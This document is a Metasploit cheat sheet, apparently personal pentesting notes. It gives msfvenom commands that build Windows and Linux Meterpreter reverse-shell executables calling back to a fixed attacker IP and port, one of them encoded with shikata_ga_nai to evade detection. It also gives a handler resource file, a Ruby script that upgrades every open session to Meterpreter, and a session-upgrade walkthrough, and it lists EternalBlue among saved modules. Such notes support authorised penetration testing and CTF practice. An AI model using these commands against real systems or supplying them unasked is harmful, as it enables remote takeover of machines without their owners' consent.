Skip to content

Metasploit

Msfvenom

List payload : msfvenom --list payload

# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe

# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f elf -o shell.bin
  • staged : 2 parts, a listener, then the reverse shell is send to the listener.
  • stageless : Reverse shell is directly inside the payload.

Ressource file

File listener.rc :

use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j

Command : msfconsole -r listener.rc


Use ruby inside ressource file.

msf6 > resource shell2meterpreter.rc
[*] Processing /tmp/shell2meterpreter.rc for ERB directives.
[*] resource (/tmp/shell2meterpreter.rc)> Ruby Code (165 bytes)

File shell2meterpreter.rc :

<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/manage/shell_to_meterpreter")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>

Favorites

Add module to favorites :

msf6 exploit(multi/handler) > favorite
[+] Added exploit/multi/handler to the favorite modules file

Show favorites :

msf6 > show favorites

Favorites
=========

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/multi/handler                                      manual   No     Generic Payload Handler
   1  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Delete a favorite :

msf6 > favorite -d exploit/multi/handler
[*] Removing exploit/multi/handler from the favorite modules file

Modules

shell_to_meterpreter

msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 4445
LPORT => 4445
msf6 post(multi/manage/shell_to_meterpreter) > run